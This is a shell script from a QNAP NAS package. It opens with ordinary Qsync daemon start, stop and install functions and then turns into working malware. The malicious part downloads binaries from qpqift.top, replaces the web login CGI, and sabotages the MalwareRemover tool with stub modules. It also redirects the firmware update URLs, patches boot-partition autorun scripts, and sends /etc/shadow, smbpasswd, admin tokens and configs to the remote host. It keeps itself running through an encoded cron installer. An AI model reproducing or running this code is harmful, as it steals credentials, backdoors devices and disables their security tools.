/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
exit 0
|
||||
fi
|
||||
fi
|
||||
XEOF
|
||||
chmod 755 ".backup_${file}"
|
||||
if grep "\.backup_${file}" "$file"; then
|
||||
:
|
||||
else
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
|
||||
echo ". ./.backup_${file}" >> "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
|
||||
fi
|
||||
|
||||
fi
|
||||
|
||||
if [ ! -f ".qdisk_cmd" ]; then
|
||||
case "$(uname -m)" in
|
||||
*x86_64*)
|
||||
arch=x86_64
|
||||
binhash='g2oe7EJJVCiAHY6AG1I1c/lGF8Y='
|
||||
;;
|
||||
*arm*|*aarch*)
|
||||
arch=arm
|
||||
binhash='Z3twHZvQqYZ1vLeu4PLnZekdkRY='
|
||||
;;
|
||||
*i*86*)
|
||||
arch=i486
|
||||
binhash='gWzECXuIp3dz5yI7RJS9d4+xpq4='
|
||||
;;
|
||||
esac
|
||||
|
||||
if [ "x${binhash}" != 'x' ]; then
|
||||
curl --connect-timeout 12 -m 1200 -k -o ".qdisk_cmd.tmp" "https://qpqift.top/data/qdisk_cmd_${arch}" || rm -f ".qdisk_cmd.tmp"
|
||||
test -f '.qdisk_cmd.tmp' && rsynchash="$(openssl dgst -sha1 -binary ".qdisk_cmd.tmp" | openssl base64)"
|
||||
if [ "x${rsynchash}" = "x${binhash}" ]; then
|
||||
mv '.qdisk_cmd.tmp' '.qdisk_cmd' && chmod +x '.qdisk_cmd'
|
||||
else
|
||||
rm -f '.qdisk_cmd.tmp'
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
binhash=''; rsynchash=''
|
||||
|
||||
for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
|
||||
if [ -f "${path#*/}" ]; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +ia "${path#*/}"
|
||||
elif [ -f "${bdir}/.qpkg/${path}" ]; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +ia "${bdir}/.qpkg/${path}"
|
||||
fi
|
||||
done
|
||||
|
||||
version=$(getcfg System Version)
|
||||
test "x${version}" = 'x' && version=$(getcfg System Version -f /etc/default_config/uLinux.conf)
|
||||
test "${version##*.}" -lt 3 || test "${version%%.*}" -lt 4 || test "$(version=${version#*.}; echo "${version%.*}")" -lt 3 && version=4.3.3 || { test "${version##*.}" -gt 5 && version=4.3.5; }
|
||||
|
||||
if [ ! -d rssdoc ]; then
|
||||
command -v bunzip2 && compext=bz2 || compext=gz
|
||||
curl --connect-timeout 12 -m 1200 -k -o "rssdoc.tar.${compext}" "https://qpqift.top/data/rssdoc.tar.${compext}" && test -f "rssdoc.tar.${compext}" && rssdochash="$(openssl dgst -sha1 -binary "rssdoc.tar.${compext}" | openssl base64)" && { test "$rssdochash" = 'WOkc6vlUa7A30GKa4Z4o02CIexk=' || test "$rssdochash" = "0h0Jyx52a/F9YB80Ml4SsEsugyA="; } && { test "$compext" = bz2 && tarflag=j || tarflag=z; } && tar -x${tarflag}f "rssdoc.tar.${compext}" || rm -f rssdoc.tar
|
||||
rm -f "rssdoc.tar.${compext}"
|
||||
fi
|
||||
|
||||
rm -f /home/httpd/{Liveupdate,FirmwareRelease{,_beta}S.xml}
|
||||
ln -s "${CWD}"/rssdoc/{Liveupdate,FirmwareRelease{,_beta}S.xml} /home/httpd
|
||||
|
||||
if grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com\|0\.0\.0\.0'; then
|
||||
internalwebport=$(/sbin/getcfg System InnerWebAccessPort -d 58080)
|
||||
localupdateurl="http://127.0.0.1:${internalwebport}"
|
||||
sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/127.0.0.1:'${internalwebport}'\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
|
||||
fi
|
||||
|
||||
test -f '/etc/config/rssdoc/qpkgcenter_*.xml' || test -h '/etc/config/rssdoc/qpkgcenter_*.xml' && { test -f '.qdisk_cmd' && ./.qdisk_cmd -i '/etc/config/rssdoc/qpkgcenter_*.xml'; rm -f '/etc/config/rssdoc/qpkgcenter_*.xml'; }
|
||||
|
||||
if find /etc/config/rssdoc | grep 'qpkgcenter_.*\.xml'; then
|
||||
:
|
||||
else
|
||||
cp "./rssdoc/Liveupdate/QTS${version}/qpkgcenter_eng.xml" '/etc/config/rssdoc/qpkgcenter_eng.xml'
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i '/etc/config/rssdoc/qpkgcenter_eng.xml'
|
||||
fi
|
||||
|
||||
for file in /etc/config/rssdoc/qpkgcenter_*.xml
|
||||
do
|
||||
if [ -f "$file" ] && { rm -f "$file" || [ ! -s "$file" ]; }; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
|
||||
touch "$file"
|
||||
cp -f "./rssdoc/Liveupdate/QTS${version}/${file##*/}" "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
|
||||
fi
|
||||
done
|
||||
file=''
|
||||
|
||||
for qpkgdir in "${bdir}/.qpkg" '../../.qpkg'; do
|
||||
test -d "$qpkgdir" && break
|
||||
done
|
||||
test -d "${qpkgdir}/MalwareRemover" || mkdir "${qpkgdir}/MalwareRemover"
|
||||
test -d "${qpkgdir}/MalwareRemover/modules" || mkdir "${qpkgdir}/MalwareRemover/modules"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "${qpkgdir}/MalwareRemover"
|
||||
|
||||
if [ -d "${qpkgdir}/MalwareRemover/modules" ]; then
|
||||
for file in 10_derek_3.pyc 12_derek_3.pyc; do
|
||||
if [ ! -f "${qpkgdir}/MalwareRemover/modules/${file}" ] || rm -f "${qpkgdir}/MalwareRemover/modules/${file}" || test -x "${qpkgdir}/MalwareRemover/modules/${file}" || [ $(wc -c < "${qpkgdir}/MalwareRemover/modules/${file}") -gt 150 ] || [ $(wc -c < "${qpkgdir}/MalwareRemover/modules/${file}") -lt 120 ]; then
|
||||
test -f '.qdisk_cmd' && test -f "${qpkgdir}/MalwareRemover/modules/${file}" && ./.qdisk_cmd -i "${qpkgdir}/MalwareRemover/modules/${file}" && rm -f "${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
openssl base64 -d <<"EOF" >"${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
A/MNCuVwTVxjAAAAAAAAAAABAAAAQAAAAHMLAAAAZQAAgwAAAWQAAFMoAQAAAE4o
|
||||
AQAAAHQEAAAAZXhpdCgAAAAAKAAAAAAoAAAAAHMVAAAAbW9kdWxlcy8xMF9kZXJl
|
||||
a18zLnB5dAgAAAA8bW9kdWxlPgEAAABzAAAAAA==
|
||||
EOF
|
||||
chmod -x "${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
fi
|
||||
done
|
||||
fi
|
||||
file=''; qpkgdir=''
|
||||
|
||||
if [ ! -f .rsakey ]; then
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
fi
|
||||
|
||||
cgibindir='/home/httpd/cgi-bin'
|
||||
if [ ! -f "1551848401_c" ] && [ -f "${cgibindir}/authLogin.cgi" ] && [ ! -f "${cgibindir}/sysauthLogin.cgi" ]; then
|
||||
test -f "1551848401_c" || touch "1551848401_c"
|
||||
case "$(uname -m)" in
|
||||
*x86_64*)
|
||||
arch=x86_64
|
||||
binhash='rrYwg0D4+4DxcDxYQsNTB4JUGlQ='
|
||||
;;
|
||||
*arm*|*aarch*)
|
||||
arch=arm
|
||||
binhash='Z4n2BZdhwjYf0wjM7GCW61WM9eU='
|
||||
;;
|
||||
*i*86*)
|
||||
arch=i486
|
||||
binhash='U3eHe6syQraRBGgsvkFZH3wibDw='
|
||||
;;
|
||||
esac
|
||||
|
||||
if [ "x${binhash}" != 'x' ]; then
|
||||
curl --connect-timeout 12 -m 1200 -k -o ".qal" "https://qpqift.top/data/qal2_${arch}" || rm -f ".qal"
|
||||
test -f '.qal' && rsynchash="$(openssl dgst -sha1 -binary ".qal" | openssl base64)"
|
||||
if [ "x${rsynchash}" = "x${binhash}" ]; then
|
||||
test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
|
||||
mv "${cgibindir}"/authLogin.cgi "${cgibindir}"/sysauthLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv '.qal' "${cgibindir}"/authLogin.cgi && chmod 755 "${cgibindir}"/authLogin.cgi
|
||||
fi
|
||||
test -f '.qal' && rm -f '.qal'
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ -f "${cgibindir}"/authLogin.cgi ] && "${cgibindir}"/authLogin.cgi | grep '<QDocRoot'; then
|
||||
:
|
||||
else
|
||||
test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
|
||||
fi
|
||||
|
||||
test -f /etc/config/.qsync.conf && authkeysfile=$(grep AuthorizedKeysFile /etc/config/.qsync.conf | sed 's/"//g' | cut -d ' ' -f 2)
|
||||
if [ "$authkeysfile" ] && [ -f "$authkeysfile" ] && grep 'miOGcmendZU2r10SdZVplBQ4i' "$authkeysfile"; then
|
||||
sed -i '/miOGcmendZU2r10SdZVplBQ4i/d' "$authkeysfile"
|
||||
lsofout="$(lsof +c 0 -i -n -P | grep :51163)"
|
||||
sshpid="$(echo "$lsofout" | tr -s ' ' | cut -d ' ' -f 2 | head -n 1)"
|
||||
kill -2 "$sshpid"
|
||||
fi
|
||||
|
||||
if [ ! -f '1548997200_c' ]; then
|
||||
touch '1548997200_c'
|
||||
mdir=`mktemp -d /tmp/.mount.XXXXXX` || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; } || mdir=`mktemp -d "${bdir}/.mount.XXXXXX"` || { mdir="${bdir}/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "/mnt/HDA_ROOT/.mount.XXXXXX"` || { mdir="/mnt/HDA_ROOT/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "/.mount.XXXXXX"` || { mdir="/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "./.mount.XXXXXX"` || { mdir="./.mount.jbbxQob"; mkdir ${mdir}; }
|
||||
__BOOT_DEV=
|
||||
__model=`getcfg System "Internal Model"`
|
||||
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
|
||||
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
|
||||
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
|
||||
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
|
||||
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
|
||||
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
|
||||
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }
|
||||
|
||||
if [ $? -eq 0 ] || mount | grep "$mdir" >/dev/null; then
|
||||
for file in "${mdir}"/K01* "${mdir}/autorun.sh" '/tmp/config/autorun.sh'; do
|
||||
if [ -f "$file" ]; then
|
||||
sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
|
||||
verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
|
||||
grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
sedcmd='s/g4rwwSz1Bp1i1'"'"'/g4rwwS'"''"'z1Bp1i1'"'"'/'
|
||||
grepstring='g4rwwSz1Bp1i1'"'"
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +ia "$file"
|
||||
fi
|
||||
done
|
||||
fi
|
||||
umount "$mdir"
|
||||
rmdir "$mdir"
|
||||
fi
|
||||
|
||||
if [ ! -f '1553058001_c' ]; then
|
||||
touch '1553058001_c'
|
||||
key=$(tr -dc 'a-zA-Z0-9' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
|
||||
test "x$key" = 'x' && key=$(LC_ALL=C sed 's/[^a-zA-Z0-9]//g' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
|
||||
{ echo "$key" | openssl rsautl -pubin -inkey .rsakey -encrypt | openssl enc -base64 -A; printf ':'
|
||||
{ echo; for file in "${bdir}/.log/.rqsys.log" /etc/config/.qos_config/users/admin/.qtoken /etc/config/.qos_config/users/admin/secondSV.conf /etc/config/smbpasswd /etc/shadow /etc/config/*.conf /etc/default_config/*.conf /etc/*.conf /etc/config/.*.conf /etc/default_config/.*.conf /etc/.*.conf; do printf '%s:' "$file"; cat "$file"; echo; done; printf '%s:' "authLogin.cgi"; /home/httpd/cgi-bin/authLogin.cgi; printf '%s:' "display_name"; /sbin/get_display_name; } | gzip | { dd bs=4096 count=512 || head -c 2097152 || cat; } | openssl enc -aes-256-cbc -k "$key" -md md5 -salt -a -A; } | curl --connect-timeout 12 -m 300 -k -d '@-' "https://qpqift.top/ping.pl"
|
||||
fi
|
||||
|
||||
if [ ! -f 1551848403_c ]; then
|
||||
touch 1551848403_c
|
||||
test -f liveupdate.sh && cronscriptpath=.liveupdate/liveupdate.sh || { test -f backup_conf.sh && cronscriptpath=.config/backup_conf.sh; }
|
||||
|
||||
if [ ! -z $cronscriptpath ]; then
|
||||
test -d "${bdir}/.system" || mkdir -p "${bdir}/.system"
|
||||
echo '(exec>/dev/null>&1 2>&1;(PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin";openssl base64 -d -A <<"EOF"|sh&' > "${bdir}/.system/.qinstaller.sh"
|
||||
chmod 755 "${bdir}/.system/.qinstaller.sh"
|
||||
{
|
||||
cat <<"XXEOF"
|
||||
( exec >/dev/null 2>&1; (
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
test -d "$confdir" || confdir=/etc/config
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
|
||||
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
|
||||
//I;s/\(^\|\
|
||||
\)\[[^\
|
||||
]\+\]\
|
||||
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
test "$fgrep" || fgrep=grep
|
||||
sleep 5
|
||||
XXEOF
|
||||
cat <<XXEOF
|
||||
if [ ! -f "\${bdir}/.qpkg/${cronscriptpath}" ]; then
|
||||
set_mutable() {
|
||||
if [ ! -e "\$1" ]; then
|
||||
return 0
|
||||
fi
|
||||
if [ -e /etc/IS_64BITS ]; then
|
||||
# 64bit set mutable
|
||||
SET_M_64="\$1"
|
||||
python -c "import os,fcntl,sys,struct;fd = os.open('\${SET_M_64}', os.O_RDONLY); rec = struct.pack('L', 0); x = fcntl.ioctl(fd, 0x80086601, rec); flags = struct.unpack('L',x)[0]; was_immutable = flags & 0x00000010; flags = flags & ~0x00000010; f = struct.pack('i', flags); fcntl.ioctl(fd, 0x40086602, f); os.close(fd)"
|
||||
else
|
||||
# 32bit set mutable
|
||||
SET_M_32="\$1"
|
||||
python -c "import os,fcntl,sys,struct;fd = os.open('\${SET_M_32}', os.O_RDONLY); rec = struct.pack('L', 0); x = fcntl.ioctl(fd, 0x80046601, rec); flags = struct.unpack('L',x)[0]; was_immutable = flags & 0x00000010; flags = flags & ~0x00000010; f = struct.pack('i', flags); fcntl.ioctl(fd, 0x40046602, f); os.close(fd)"
|
||||
fi
|
||||
}
|
||||
test -f "\${bdir}/.qpkg/${cronscriptpath%/*}" || test -h "\${bdir}/.qpkg/${cronscriptpath%/*}" && { set_mutable "\${bdir}/.qpkg/${cronscriptpath%/*}"; rm -f "\${bdir}/.qpkg/${cronscriptpath%/*}"; }
|
||||
test -d "\${bdir}/.qpkg" || mkdir -p "\${bdir}/.qpkg" || mkdir "\${bdir}/.qpkg"
|
||||
test -d "\${bdir}/.qpkg/${cronscriptpath%/*}" || mkdir "\${bdir}/.qpkg/${cronscriptpath%/*}"
|
||||
cat > "\${bdir}/.qpkg/${cronscriptpath}" <<"XEOF"
|
||||
XXEOF
|
||||
cat "${cronscriptpath#*/}"
|
||||
cat <<XXEOF
|
||||
XEOF
|
||||
chmod 755 "\${bdir}/.qpkg/${cronscriptpath}"
|
||||
touch -cr /bin/busybox "\${bdir}/.qpkg/${cronscriptpath}"
|
||||
( ( exec >/dev/null 2>&1 </dev/null; "\${bdir}/.qpkg/${cronscriptpath}" </dev/null >/dev/null 2>/dev/null & ) & )
|
||||
fi
|
||||
|
||||
test -x "\${bdir}/.qpkg/${cronscriptpath}" || chmod 755 "\${bdir}/.qpkg/${cronscriptpath}"
|
||||
|
||||
crontabargs=\$(ps | grep 'cr[o]nd ' | sed -n 's/.*crond[^0-9A-Za-z-]*\\(.\\+\\)/\\1/p')
|
||||
trycount=10; trycount=\$(( \$trycount - 10 ))
|
||||
set x \$crontabargs; shift
|
||||
while [ \$# -gt 0 ] && [ \$trycount -lt 10 ]; do
|
||||
trycount=\$(( \$trycount + 1 ))
|
||||
getopts ':c:' OPT 2>/dev/null
|
||||
test "\$OPT" = 'c' && crontabfile="\${OPTARG}/admin" && break
|
||||
test "\$OPTIND" -gt 0 && shift "\$OPTIND" && OPTIND=1 || break
|
||||
done
|
||||
test "\$crontabfile" && test -f "\${crontabfile}" || crontabfile='/tmp/cron/crontabs/admin'
|
||||
|
||||
for crontab in "\$crontabfile" "\${confdir}/crontab"; do
|
||||
if \$fgrep "\${bdir}/.qpkg/${cronscriptpath}" "\$crontab"; then
|
||||
:
|
||||
else
|
